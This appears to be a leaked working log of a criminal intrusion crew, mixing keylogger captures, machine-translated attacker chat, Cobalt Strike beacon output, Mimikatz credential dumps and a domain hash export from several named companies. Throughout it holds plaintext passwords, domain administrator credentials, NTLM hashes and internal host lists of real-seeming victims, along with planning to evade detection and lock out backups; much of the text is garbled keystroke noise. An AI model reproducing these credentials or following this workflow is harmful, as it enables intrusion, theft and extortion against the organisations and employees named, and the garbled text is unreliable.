htP has[backspace][backspace][backspace][backspace]aacs[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace]hs ces[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace]iyou uat you srd?Dd pde[backspace]drpaswo Reve [backspace][backspace][backspace][backspace][backspace][backspace]mv[backspace]o[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace]

All Devices - Google Chrome
=======
12.168[down]


All Devices - Google Chrome
=======
9[down].

New Tab - Google Chrome
=======
218.0


New Tab - Google Chrome
=======
19.6.

Cortana
=======
d

Cortana
=======
mc[backspace][backspace][backspace][backspace]cmd


Command Prompt
=======
nettat


Command Prompt
=======
s

Cortana
=======
mc

Command Prompt
=======
louparkt

Cortana
=======
d


Command Prompt
=======
nsok meing


All Devices - Google Chrome
=======
tor

All Devices - Google Chrome
=======
se

Remote Desktop Manager Free [wwsql]
=======
c


Remote Desktop Manager Free [wwsql]
=======
[down]

All Devices - Google Chrome
=======
e

All Devices - Google Chrome
=======
mik

(+) Waterway Gas and Wash | Slack
=======
Yee nade it

(+) Waterway Gas and Wash | Slack
=======
s I creatdo nd add tothet puwopojshosh rect[backspace][backspace][backspace][backspace][backspace][backspace]pot rjec.ale rtrady ceae tdiadn D yunido eei[backspace][backspace]som io ri? d nenffom t

Why not[ ](https://mediaeveryone.com/group/waterway-com?msg=6PW4HbwfGTT4T5933) change all passwords[ ](https://mediaeveryone.com/group/waterway-com?msg=mdGqYwYbvv8fgZwx8) give me the full log, then nimbles can be turned on to block our access, they see where the letter came from until they wake up at the time to block your backup system to enter?i have locked it down promises not to lock it so he says it's a bad letter, i don't know what kind of letter it is
the other one1 asks what it is, a ticket or a voicemail
the first responds so it throws our message does not seem it forwarded from the incident with the password to the same RE see this file our message that we sent a file? [ ](https://mediaeveryone.com/group/waterway-com?msg=qCu3zj4Msa5t28oTk) fix where was the passkey, does not fit this passkey should be115s21! check it) ``
New Tab - Google Chrome
=======
19216.0.75



=======
m[backspace][backspace]


=======
nibil[backspace]e[backspace][backspace][backspace][backspace][backspace]19218[backspace][backspace][backspace][backspace].60.7[backspace][backspace][backspace].755[backspace]0.2[backspace]

192.168.0.75 - Nimble Storage - Google Chrome
=======
91

192.168.0.75 - Nimble Storage - Google Chrome
=======
115279[tab]1Ns1!1915N29!!s17[tab]19N79![tab]115s21!
``````
]Hey Latoya,

Unfortunately, we do not know what the password for this would be as it was originally set by someone in CCC>[backspace][backspace]. My c[backspace]recomendation, if n[backspace]no one knows the password, woul dbe to follow the forgot password instruction[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][link/[backspace][backspace][backspace][backspace]te[backspace]re[backspace]uctions using [control][ctrl]v
```
```
Please let me know if you need anything else from us ot [backspace][backspace]r[backspace]or if you have
``Any pass?
Mail - mpusatera@waterway.com - Google Chrome
=======
1853[backspace][backspace][backspace][backspace][backspace][backspace][backspace]Gators1853[tab]Morgan914[tab]Morgani[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][Morgan914

Outlook - Google Chrome
=======
Morgan914


New Tab - Google Chrome
=======
change outlook
```
this must be the new email password mapusateramharper[ ](https://mediaeveryone.com/group/waterway-com?msg=AenPRtGWoPZW39ARz) whose keylog?
192.168.0.75 - Nimble Storage - Mozilla Firefox
=======
administrator[tab]1854[backspace]3Gatr[control][ctrl]a1853Gators
mharper[tab]LoveUnit14*[tab][tab][tab][right]@waterway.com
LoveUnit14*


SQL Search - Microsoft SQL Server Management Studio
=======
[ctrl][control]v
``Slash starta hai bezi with mailoni also pick up``
192.168.0.75 - Nimble Storage - Mozilla Firefox
=======
administrator[tab]1854[backspace]3Gatr[control][ctrl]a1853Gators
mharper[tab]LoveUnit14*[tab][tab][tab][right]@waterway.com
``Task is just catching100%will they be changing the shumihalovym)well hz, they wrote that they serviced a couple of months ago and probably changed the I think you locked the admin account then...wait lol)no, he tried to log in as admin\administrator caught the access?blauer[ ](https://mediaeveryone.com/group/waterway-com?msg=vZuDXyXu9LuYCpFn3) who's sitting here? well this reverse timer says he didn't send it so i'll try to authorize under this pass nibblewith nibblewith this dc, didn't he logged in?
Remote Desktop Manager Free [wwdc1]
=======
[down]
con[down][up]t
ateray99!
Wwill1Vana2
```
monitor the ``bluetooth``.
Waterway IT - Agent - Google Chrome
=======
i ou[backspace]osrth [backspace]n udo[backspace]i ta ha dthh balot wng e
``and specifically she's got the keylogger up crookedly she's logging in chicly everything's under control @user7 I think I've got the harperMark and Brandon
192.168.0.75 - Nimble Storage - Google Chrome
=======
to15

192.168.0.75 - Nimble Storage - Google Chrome
=======
[backspace]

192.168.0.75 - Nimble Storage - Google Chrome
=======
r8

192.168.0.75 - Nimble Storage - Google Chrome
=======
Gs

192.168.0.75 - Nimble Storage - Google Chrome
=======
3
``))))) on runettesI looked at my last pass and the last thing I had for this is administrator and the administrator password for this connection.
 
I think a couple months back that Mark and Brandon were doing some maintenance and they might have had to reset this not sure though.  They might know it.  I mean I would hope so at this point.... so they don't know the password themselves) says "fuck me" in the last one.
192.168.0.75 - Nimble Storage - Google Chrome
=======
a

Inbox - djarden@waterway.com - Outlook
=======
Ila as a [backspace][backspace] frhimstt dsdor[backspace]ftkac t MndBnow dno [backspace]t [backspace]tnc y h u ho[backspace]wi [backspace][backspace] iath ith mn o lo a s pin[backspace][backspace].

Waterway IT - Agent - Google Chrome
=======
 bl i edal
``Yeah noticed before it was fine and stood up crvokstat says the connection is wrong What the fuck is not keylogging? and I do not understand the fun) go to the screenshots it does? only this caught ``
192.168.0.75 - Nimble Storage - Google Chrome
=======
a
Did it come in or not?
Inbox - djarden@waterway.com - Outlook
=======
ik


=======
6[backspace].

192.168.0.75 - Nimble Storage - Google Chrome
=======
a

Inbox - djarden@waterway.com - Outlook
=======
Ila as a [backspace][backspace] frhi
If there is no pass from there))) if not tomorrow morning, then wait for the moment, there are messages on the mail? judging by the keylogum not much they are going to there then close the network if the pass nimbly pops up then do ``
setg Proxies socks4:209.222.97.8:6731
``Give the socks workers no alerts or not``?
[-] screenshot from desktop 2 is empty
 
  CurrentUser : WATERWAY\mapusatera
  Idletime : 00h:04m:33s:063ms (1326343 milliseconds)
``empty`` - nothing in the keylog, did any of the mail have a nimble login alert? Nothing else?
Waterway Gas & Wash - Mozilla Firefox
=======
michaelpusatera@gmail.com[tab]w[backspace]w@terw@y
w@terw@y
``````
Waterway Gas and Wash | Slack - Google Chrome
=======
does anyone recod[backspace]gnize this email adre[backspace][backspace]dress? [control][ctrl]v
All, I removed some old accounts from the internals [backspace][backspace] site / API.  I t[backspace]dont'[backspace][backspace]think this should cause any issues as the [backspace][backspace][backspace]i don't thin[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][a[backspace][backspace][backspace][backspace][backspace] since any of the accounts have been used recently.  if you notice any issues, please let me know.
``Not on the phone by any chance?
because there in the mail someone complained about a phish letter from bobane to mail@tl1 and who sent the letter ?
Inbox - djarden@waterway.com - Outlook
=======
[delete][down][down][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][down][up][up][down][delete][delete][delete][delete][delete][delete][delete][down][down][delete][delete][delete][delete][down][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][down][delete][delete][down][down][down][delete][delete][delete][delete][delete][down][down][delete][delete][delete][delete][delete][delete][delete][delete][down][delete][delete][delete][delete][delete][down][delete][down][delete][delete][delete][delete][delete][delete][delete][down][delete][delete][delete][delete][delete][delete][delete][delete][delete]

``````
Inbox - djarden@waterway.com - Outlook
=======
[delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][ctrl]c

``Basically, this is what it's all about''.
Windows Security
=======
Myoldpassword6*
MyNew[backspace][backspace][backspace][backspace]Myoldpassword6*
``+djarden does it have keylogs?
[-] screenshot from desktop 2 is empty
``And now there's 16-17 hours in the keylog, it looks like it's been on 24 hours``
  CurrentUser : WATERWAY\mharper
  Idletime : 00h:43m:30s:657ms (2610657 milliseconds)
``````
waterway.com



WIN SERVER:

by AD: 16
Alive: 11 (including those without 445)
Attracted: 7

no 445:
    PDITESTSQL.waterway.com
    reporting.waterway.com
    WWSQL2Old.waterway.com
    wwsql02.waterway.com

Destination host unreachable (I pinged from different hosts, this is the case everywhere):
    PDIProdWeb2016.waterway.com
    WW2K1Old.waterway.com
    WWSQLOLD.waterway.com
    WATERWAYDSC02.waterway.com



ARMS:

AD: 294
alive: 200
Didn't ask he cleared his desktop? Slack? Just a bunch of errors, no noise on the mail? but keep monitoring nimble nimble nimble192.168.43.8
192.168.43.8 - Google Chrome
=======
Admin1Vanilla2
Admin[tab]Admin
[alt][alt]

Waterway Gas and Wash - Google Chrome
=======
MyNewPassworx6[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] [backspace][backspace][backspace][backspace] [backspace][tab][right][backspace]Djarden6*


Waterway IT - Google Chrome
=======
djarden@waterway.com[tab]MyNewPas[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace]Djarden6*
``and take screenshots see what kind of movement see the keylogging then monitor the mail for noiseotnoo, the keylogs are hanging, nimbles and mail is opentoo everything is ready?either at night or close at once from noise-mail monitor on the situation nimbles are open as soon as we catch immediately enter through soks with the same machine within an hour after 18 wait for the passkeylog hangs on itishnicksharms to ping, yes pre.bat runtut are we all ready? to the live ones I attributed those without ports` ``
waterway.com

WIN SERVER:

by AD: 16
Alive: ~11
Attracted: 7


1. here newpcforsomeone arm pulls instead of PDITESTSQL
        ping PDITESTSQL.waterway.com
            Pinging PDITESTSQL.waterway.com [192.168.0.127]
        ping -a 192.168.0.127
            Pinging newpcforsomeone.waterway.com [192.168.0.127]

    beacon> portscan PDITESTSQL.waterway.com
    [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on PDITESTSQL.waterway.com
    [+] host called home, sent: 93285 bytes
    [+] received output:
    Scanner module is complete

2. PDITESTWEB.waterway.com
        Ping request could not find host PDITESTWEB.waterway.com. Please check the name and try again.

3. beacon> portscan reporting.waterway.com
    [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on reporting.waterway.com
    [+] host called home, sent: 93285 bytes
    [+] received output:
    Scanner module is complete

4. beacon> portscan WWSQL2Old.waterway.com
    [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on WWSQL2Old.waterway.com
    [+] host called home, sent: 93285 bytes
    [+] received output:
    Scanner module is complete

5. beacon> portscan wwsql02.waterway.com
    [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on wwsql02.waterway.com
    [+] host called home, sent: 93285 bytes
    [+] received output:
    Scanner module is complete

6.  Destination host unreachable:
        PDIProdWeb2016.waterway.com
        WW2K1Old.waterway.com
        WWSQLOLD.waterway.com
        WATERWAYDSC02.waterway.com
    Pinged from different hosts, everywhere like this
``I'm going to pick up a log and send it to a ticket at ITSport, maybe there will be something there.
spiceworks
tyler.terzigni@grantweber.com
st@yntru3
````https://10.10.10.8/cgi-mod/index.cgi ``the baracuda``
--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://login.live.com/
Identity : robert.nye@grantweber.com
Credential :
LastModified : 6/28/2020 9:06:43 PM
``Shutdown Procedure
 
Log onto 10.10.10.2 -- Use VMWare VSphere Client to log onto the VMWare host servers.  (192.168.75.100, 192.168.75.105, 192.168.75.115, 192.168.75.120, 192.168.75.130)
 
Shut down the individual servers, then after the server are shut down, place the VMWare host in "Maintenance Mode" then shut down the host
Do this for each vmware host server
 
After all servers are shut down then shut down the 10.10.10.2 and 10.10.10.3 and 10.10.10.20 , 10.10.10.22 servers
 
The log into http://10.10.11.251 , launch as an application and log in to the equallogic, and shut it down.
 
Log onto thecus and power it down ` 10.10.10.30 user name admin pass admin
 
Startup procedure , simply reverse this order, wait at least 5 mins after powering on the equallogic to power on the vmware servers....``
FTP User name -- conway
password -- C@r30fC0nw@y
Host address is -- sftp.grantweber.com
The port is -- 22
Protocol is -- sftp
``````
FTP User name -- pahranagat
password -- $3cur32GW
Host address is -- sftp.grantweber.com
Port is -- 22
Protocol is --- sftp
``esxi without 22 from kcs doesn't work anywhere but kcs``
DA CREDS:
    grantweber.com\administrator 2016GW@Calabasas
    grantweber.com\tyler.terzigni st@yntru3
    grantweber.com\casey.covello grant2021
    grantweber.com\robert.nye grant2020
    grantweber.com\jimi.bingham grant2017
    grantweber.com\stanleyford c7615aa7f26bfa244265524d6e298ecc
    grantweber.com\monitor.acct 190d7c1850cd42a7197a6bd805f50bc9

MIMIKATZ CREDS:
    ___________________________________________________________________
    Creds: |Ports/Info:|Valid:
    ____________________________________________|___________|__________
    	Username : GRANTWEBER0\root | 22 |
    	Domain : 10.10.10.220 | kcs | +
    	Password : D@kc$1 |
    ____________________________________________|___________|__________
        Username : grantweber0\administrator | 80,443 |
    	Domain : 10.10.10.233 | Telephony |
    	Password : GW3b3r2014 |
    ____________________________________________|___________|__________
        Username : grantweber\jimi.bingham |
    	Domain : 10.20.0.101 | dead |
    	Password : THECOVE |



HYPER-V (from AD):
    gwca-hv-akcelerant.grantweber.com [10.10.10.20]

ESXi (it won't let you login, only download the client):
    192.168.76.130
    192.168.76.122
    192.168.76.121
    192.168.76.120
    192.168.76.118
    10.40.10.237
    10.40.10.236
    10.40.10.235
    10.10.10.27

NAS:
    10.10.10.30
        User: admin
        Pass: admin
````192.168.45.109````
192.168.76.130:8100
192.168.76.130:8000
192.168.76.130:5989
192.168.76.130:902
192.168.76.130:443
192.168.76.130:427
192.168.76.130:80
192.168.76.123:8100
192.168.76.123:8000
192.168.76.123:5989
192.168.76.123:902
192.168.76.123:443
192.168.76.123:427
192.168.76.123:80
192.168.76.122:8100
192.168.76.122:8000
192.168.76.122:5989
192.168.76.122:902
192.168.76.122:443
192.168.76.122:427
192.168.76.122:80
192.168.76.121:8100
192.168.76.121:8000
192.168.76.121:5989
192.168.76.121:902
192.168.76.121:443
192.168.76.121:427
192.168.76.121:80
192.168.76.120:8100
192.168.76.120:8000
192.168.76.120:5989
192.168.76.120:902
192.168.76.120:443
192.168.76.120:427
192.168.76.120:80
192.168.76.118:8100
192.168.76.118:8000
192.168.76.118:5989
192.168.76.118:902
192.168.76.118:443
192.168.76.118:427
192.168.76.118:80
192.168.76.118:22 (SSH-2.0-OpenSSH_5.6)
192.168.76.117:8100
192.168.76.117:8000
192.168.76.117:5989
192.168.76.117:902
192.168.76.117:443
192.168.76.117:427
192.168.76.117:80
192.168.76.117:22 (SSH-2.0-OpenSSH_5.6)
192.168.76.116:8100
192.168.76.116:8000
192.168.76.116:5989
192.168.76.116:902
192.168.76.116:443
192.168.76.116:427
192.168.76.116:80
192.168.76.116:22 (SSH-2.0-OpenSSH_5.6)
192.168.76.115:8100
192.168.76.115:8000
192.168.76.115:5989
192.168.76.115:902
192.168.76.115:443
192.168.76.115:427
192.168.76.115:80
192.168.76.115:22 (SSH-2.0-OpenSSH_5.6)
192.168.45.236:8889
192.168.45.236:5900
192.168.45.236:623
192.168.45.236:443
192.168.45.236:80
192.168.45.236:22 (SSH-2.0-dropbear_0.52)
192.168.45.158:443
192.168.45.158:389
192.168.45.158:143
192.168.45.158:135
192.168.45.158:80
192.168.45.158:25 (220 mail.dixandassociates.com Microsoft ESMTP MAIL Service ready at Wed, 17 Feb 2021 04:22:22 -0800)
192.168.45.145:6544
192.168.45.145:443
192.168.45.145:80
192.168.45.109:80
192.168.45.43:7680
192.168.45.43:5900
192.168.45.43:5040
192.168.45.43:139
192.168.45.43:135
192.168.45.43:445
192.168.45.158:445
````192.168.45.170 ``192.168.76.122
```
    User: monitor.acct - IP Address: 10.10.10.114
    User: casey.covello - IP Address: 10.10.10.74
    User: robert.nye - IP Address: 10.10.10.241
    User: SQLAdmin - IP Address: 10.10.20.20
    User: tyler.terzigni - IP Address: 10.10.10.77
    User: tyler.terzigni - IP Address: 10.10.10.151
    User: bknoticing - IP Address: 173.247.171.103
    User: jimi.bingham - IP Address: 10.40.10.29
    User: Administrator - IP Address: 10.10.10.5
    User: Vincent.Velardi - IP Address: 10.10.10.120
``hyper-v
``gwca-hv-akcelerant.grantweber.com [10.10.10.20]`:zany_face: :zany_face: :zany_face: :zany_face: :zany_face:)not the hostname is the port? trying to log in via vntz viewer what are you doing please tell[ ](https://mediaeveryonecom/direct/aLgWcQx7CGaqXfqkNyJcaRFnKQqepiffHq?msg=KqLs7hjKiZHYtHwRS) is a password...I also can not let through because of this vpn change vnts9005saijdusyd789syd7 ``
Recovery
Creative
```
disks are on NASA, access is on Danas
```
http://172.17.70.232:5000/ qlyons applecherrypenguinski
``````
hqnas2.evo.local
photo-nas.evo.local

``Is it there now? The windef is on-try the dll should already have been waiting for action after the lock)`` Maybe
no it's not there yet or prophylaxis or they didn't throw it out, it's probably the session died of something
us unlikely to have figured out, we wrote above that YES passwords have not changed, just apparently what they had a lag with the authorization oflovid, under the Vpn, but the domain is available[ ](https://mediaeveryone.com/group/evo-com?msg=Dzf6p5uafhY8G45MT) on it like our granddick under the Vpn?
just spunnom upload the load available
HAL.evo.local
HQVEEAMPROXY2.evo.local
veeamtemp.evo.local
``in the center
```
hq-vcenter-2.evo.local
tcooley@evo.local
SammySeveDog44
``Reviewed the bludhound today, you can see that the parallels YES, the closest - changed in SeptemberIt turns out we were not redeemed)in general the creeds have not changed, tried today they are valid. For what reason so is not clear.`https://remote.itc-us.com/rdweb/pages/en-us/password.aspx` on the desktops of the admins saw a change of password, I wonder where it will lead to the creeds ``.
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe Nathan ITC\br_admin CAKE@horse369!@@
[*] Tasked beacon to run .NET program: SharpSniper.exe NathanK ITC\br_admin CAKE@horse369!@@
[+] host called home, sent: 113781 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

``This is with the token.
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe NathanK
[*] Tasked beacon to run .NET program: SharpSniper.exe NathanK
[+] host called home, sent: 113721 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

````NathanK - what computers was he on ?
URL : http://itcma-mits01/mitsdiscover/doLogin.md
Username : jasonh
Password : Fall@ITC2020!
``````
URL : http://itcma-mits01/mitsdiscover/doLogin.md
Username : brandent
Password : HGp752308!

--- Chromium Credential (User: brandent) ---
URL : https://login.verizonwireless.com/vzauth/UI/Login
Username : 5746121367
Password : HGp752301!

``````
--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : http://itcma-mits01/
Identity : garya
Credential :
LastModified : 5/7/2020 4:03:55 PM

--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://remote.itc-us.com/
Identity : garya@itc-us.com
Credential : Wizz3r600
LastModified : 5/4/2020 12:58:26 PM

``````
OU=Security Groups
ITCMA-RDS01.ITC.LOCAL 10.0.0.8
ITCMA-RDS-SVR01.ITC.LOCAL 10.0.0.6
``:thinking:``
[DC] 'ITC.LOCAL'
``````
[DC] 'ITC.LOCAL' will be the domain
[DC] 'ITCMA-FILE03.ITC.LOCAL' will be the DC server
[DC] Exporting domain 'ITC.LOCAL'
1307 infor-test e3a0168bc21cfb88b95c954a5b18f57c 66050
1230 SPInstall ad145b1324989a3f7e1b045626778aea 66050
1232 SPServices 1b3e048d0a40d7c1fac55d6a99297b4b 66050
1304 DHCPDNS dd3f1f083348928ac57db76899e77152 66050
5124 MSOL_ff1eb51ea3ce 98128e43603e7dfdeb1ca559bf8b8256 66080
1642 MainConferenceRoom fe2e8e6e99ac9b05632c831324f708dc 66050
1643 OperationsConference fe2e8e6e99ac9b05632c831324f708dc 66050
5677 AZUREADSSOACC$ 89f488f470b5d44e9b31a762dee94eee 69632
8117 itcmarketing 6aa8a83f5b896d92af48eec925d8714a 512
2146 itccommunications 2ec7b543428ce4cdbde99026428942ed 66048
8191 PCSetup e3f462c08d32e3ba49ed3037037dada0 512
5347 paulaw b1f07bd1d38e076c00b9012f8f20a1a9 514
5297 RyanQ 8850823d1b5bf81b31242f4acd852eed 514
8143 simonw b1f07bd1d38e076c00b9012f8f20a1a9 514
8194 bornz 8574e1d48547de1139bc34ee4afb799b 514
5690 DESKTOP-RCV5PNA$ 5e0ac7ff6f0987a30efeaa03816a9f17 4096
39604 DESKTOP-AE0UUHL$ 7d8b22ab27a2841c7f2994a3eab6616e 4096
40104 ITCMA-WS1025$ 0ca84975a9eeb28c7bcddbf207c520fc 4096
5679 funtech cbe0e0e7bec3a940fa2f18b2b19bb27d 66048
1718 elkconference 69d5ef661299dd1aafa3ff55e0c430c7 66050
5332 ElkProd2 1417dde3ca1f67084b85fcbd6bcc1f97 512
8204 Test_Primary eb6538aa406cfad09403d3bb1f94785f 66048
40105 DESKTOP-07M1VFM$ 6caaa5a92aa3c25fe10a60af41b871e5 4096
9110 eglchina 08b0ec954a94d3c7f1824957bf3fde72 66048
6604 ITCMA-ESXI03$ ec4af0abf49ecbcc062d5d2f9b534c3a 4096
40129 phoebel 4eea3619d2e635f527a3eeb5d4810253 514
5219 ITCMA-WS1064$ a5213099145a2f4b4e4ac46a3a315cda 4096
9126 ASITC-WS0040$ 851577386ab6a8ec5a84d6a84f9b1b3 4096
40111 tigera 565b89a26b92e552143b5ab2d1643469 514
9127 ASITC-WS0044$ 6ecaee8af623e5576c5f016cedfa3dcc 4096
40146 ITC-CK-PC$ 0d343cec8d448c0c6c45b2dc0bd037d9 4098
5218 ITCMA-WS1065$ 5a3abb44e287f90fae60f11c832ee53a 4096
40162 marilynp e62830daed8dbea4acd0b99d682946bb 512
5301 AustinZ 565b89a26b92e552143b5ab2d1643469 514
9111 kevincopy 2bc2a0308594f2e7481db79c9904e160 514
40121 masonl 7e5792cca8031c0d2dc2c576be8d02e9 514
8139 AndyG b1f07bd1d38e076c00b9012f8f20a1a9 514
40113 janiel 535baf9cf1c3067f9e952cc093f47cea 514
40109 kellyh 08b0ec954a94d3c7f1824957bf3fde72 66050
40106 KimJong 08b0ec954a94d3c7f1824957bf3fde72 66050
40114 navyw 7e5792cca8031c0d2dc2c576be8d02e9 514
5224 elkquality e62830daed8dbea4acd0b99d682946bb 512
40167 rogerm 950a6742fc3da61d118438d1728d604f 512
5660 ITCMA-WS1097$ d348eed65814c1a1f72606d6f07bfac1 4128
39634 ITCMA-WS1095$ b884941346dedaf6d219ba05a51e1753 4128
40119 ITCMA-LT1025$ 6310bb849025ed7b333dd355d1740220 4128
6609 ITCMA-LT1007$ f1e56d0a051db1659a732e6beac8dea3 4096
40176 elishav cbfbcd678b17a8e90ead8638a26eb79c 512
39610 svandyk ed3ccdc38762122a9271c5208d47a301 66048
9119 ASITC-WS0031$ 2c994ffb54b64ce1034ad7a7b8a1db34 4096
9198 ASITC-WS0034$ 6b76cf6737a0e543376191ac3298fe10 4096
5111 ITCMA-WS1021$ f70868955a189abd9cc466e4c01791ba 4096
40117 evany e62830daed8dbea4acd0b99d682946bb 512
39680 PassPortalTest4 d8043111423e997954d32ef405d8ba4f 66048
39678 PassPortalTest2 75bf1e74747577ac3cc3022b8024b5d8 66048
39679 PassPortalTest3 ef188f6919861aa64419642984d21864 66048
8112 ITCMA-WARROOM$ bf3d3790654619faca38a562bbfc38d5 4128
9124 ASITC-WS0071$ aebe58ae5dad870b4000ae5ee82a76bd 4096
9189 ASITC-WS0032$ 8ddab2c440184c51cfa52715d4f11c63 4096
39633 amazonfba 38f41f2e718ae51efb693b25fb45ed49 66048
5327 ElkShipping 85a60283d2ff2fbd2d40badac9f8a0fe 512
40157 jessiel 8d0f1edbb9f7ea4bbf078827f1cde656 512
5671 ITCMA-LT1064$ bb74c335daff931f17adf9dd73dd0507 4096
39683 nbktest 18fd0c3e7f5d1485e5e46b86f4923ae3 512
40163 mollieh 70e19f6d815e259d52e69172094dc503 512
39664 rachelt 740f70197f2cf7ce6f4e10ca6de5f8c0 512
5208 infor_edi_old 1941c372c3c802defa0af03fddf10c04 66050
5341 sophiac de43e1dcc48916c8096fd857d9619292 514
39612 richb 58aa5e467abb3c5961b0f82ba20782a8 514
5682 laurenj 92670f877d5c6b94abcbb85de50dd647 514
5662 kristaa 8574e1d48547de1139bc34ee4afb799b 514
8172 KatieD 8574e1d48547de1139bc34ee4afb799b 514
5622 DanW eb450fca0a5bed7a5417b5cc9f7d295e 514
8145 AlainaB ba41503f5187aa6f2fbbd576b23b9dc9 514
9118 ASITC-WS0030$ 6db7e0cdcc84e6880df1dff0e9d80dcf 4096
1328 ITCMA-LT1018$ 147b80e8897d09b07ffdc0a898624336 4096
8147 RebeckaC a64795a7d05999a0c2b429586799325c 512
39651 nancyk a64795a7d05999a0c2b429586799325c 512
40115 chaoq cebf8373c4e81a3109faa4043db329d9 514
40149 jerretts e485bbd13a37e4c01272de95d4b644e 514
40161 carlosl f02f1e684771ad51a908ca043ce09733 512
39677 PassPortalTest 589b85762d8ab451401df29aa7fdc417 66048
39686 itccorporatecalendar 589b85762d8ab451401df29aa7fdc417 512
5294 MarkH 7e8c067a506d3190fca59fd3fc61de61 514
1637 Donnettaw a477358010d4eecc48a114f8b7bdb105 512
39681 kellyb 81bb9e0d650df6876cb9dacb2586b505 512
40182 ITCMA-LT1022$ f83f07b0ef6a2600d91ba1fcbdd3d6a5 4096
2205 ITCMA-WS1024$ a1d33625bce1fb2b27236a67b1bd3325 4096
9212 ASITC-WS0096$ 841ca8f92e93e1bad2c4a11412450e8a 4096
39695 ITCLab2 bf1956f6cdff81985e99edf817ab218c7 512
9129 ASITC-WS0013$ bb1df45881daa0a52109b7694c8d4c0e 4096
40178 ITCMA-WS1028$ cf129aa3bbbc16d90669cd646a453bfe 4128
9190 ASITC-WS0001$ d85302272ad9fccfa85ab06cfac2944a 4096
40174 jerryt 32b8ba6aaecbe2d456f2076012541e74 512
9216 ASITC-WS0097$ 8c8a0524e9cab69c33693891c4be7670 4098
4612 ITCMA-WS1054$ 8ff55e603b1249172edfaf3e5de18a7f 4096
39647 PRODuser 317e1d6c0c4eaa48b331df1a6310060b 512
5201 ITCMA-LT1030$ 4b9f8a314c36ce60329ebaea441fee84 4096
5236 galenw 70586bc2191f0a0872798bcb30c7fcdf 514
5277 ITCMA-WS1077$ 647829b8512a3810780c2fd4fe66f96f 4096
39698 edwardm 3a37fbb6f2020618ebf9a8bab1f64dde 512
5618 ITCMA-WS1074$ 8b3c8ea7623bba2bb3e041a548e0a792 4096
8158 ITCMA-LT1066$ 9419e85545da2871cb542501b4cf0be2 4096
2210 ITCMA-WS1061$ 7fb0b7230dc444f3ebc6e3c6c418a697 4096
5637 ITCMA-WS1087$ f01ed101778a0235811623ddd954f039 4096
40152 maxwellm 273ca5b7b32220194ff7657572bc2a02 512
2218 ITCMA-WS1073$ a6cf4f5d9f9c6b59c7a972d525449e90 4096
2215 ITCMA-LT1032$ 0600883b7fbe72cd3afe33b2781e50b9 4096
5298 c59efdbb56e56613ecd45db5787b04da 512
5330 itcma-ws1091$ 1933cf26ff46aee9e3898ebac4936237 4096
9142 ASITC-WS0075$ 75233948358758b4dd0282f50108824e 4096
39697 juliew 7d7883ad4dfafde4fd3d3811f8100167 512
40180 ASITC-WS0098$ 3b7e9417b27ac5752872171fe45e37ba 4096
9201 ASITC-WS0093$ 3f142e51193e786dfa669a832ee1e392 4098
2147 ElioCommunications 2ec7b543428ce4cdbde99026428942ed 66048
39694 itclab1 0ea4a865b25888558a0ae8b04c6f1162 512
5678 it-imac$ 5e57fc72f37055885756da33f1e76e29 4096
2113 CoreyB 6578de80fdfdf6e2b607eadfbb189810 544
40175 dasmondr c4dfe7c00de60ce6303229ff20a56b8b 512
40158 theodoren b88ff38608970d449d0ea007b9cefb5d 512
40151 karenh ad1677745d36039bcfc0794be2a6cf94 512
1695 thomasl dff852fcb8a279afdcfa4e005b1bacc8 514
40138 martinh 70586bc2191f0a0872798bcb30c7fcdf 514
40116 tinayu 65d75e5a9d12ad87369cc0cb3b230dab 514
2157 ITCMA-VCEN01$ 5eca2e6d3c301ccabced38191da6e644 4096
1724 Royw acbfc03df96e93cf7294a01a6abbda33 514
8155 IvanY cebf8373c4e81a3109faa4043db329d9 514
39632 timy cebf8373c4e81a3109fa9fa4043db329d9 514
39649 andrewz 535baf9cf1c3067f9e952cc093f47cea 514
9112 ASITC-WS0051$ 5a86180ad668883a48ad7b207fb92905 4096
40150 dennisc b5d62c1224046538a3fc5ee33f26b378 512
40153 michaelc 7909b2d24e607f4f2fd7881160049700 512
40160 jamesp fe50873f72b94169590015cb59630456 512
40159 maryf d8f2665dd17622f840d7127a250338a1 514
9161 ASITC-WS0069$ 7481e6e9fe8486e1034ab06500260070 4098
5621 ITCMA-WS1078$ 357235dcf1bfaebd7e0d22f2a3e52a93 4096
1129 dickh 1c7866f2a9f7ab1d6601443f65512f69 512
2169 KippU 6fbf03d408766a59be6156df406d27b 514
9188 ASITC-WS0046$ 840beaac0c660294b355fbb97ec7b787 4096
1654 kirto a64795a7d05999a0c2b429586799325c 512
8108 OliviaM 83693bd82d5287fa53329e244f2b5bc0 512
9139 ASITC-WS0021$ 5663ec743caf9f7388488b2ad4b8d945 4096
40155 jaredn b12d1fb1d52ee2de7285261d1401da83 514
9225 ASITC-WS0125$ 285f9f9f26cc7d4fe900b722093c731bbc 4096
8130 ITCMA-NAS02$ aee317af072ee03f7617bc92be21e602 69632
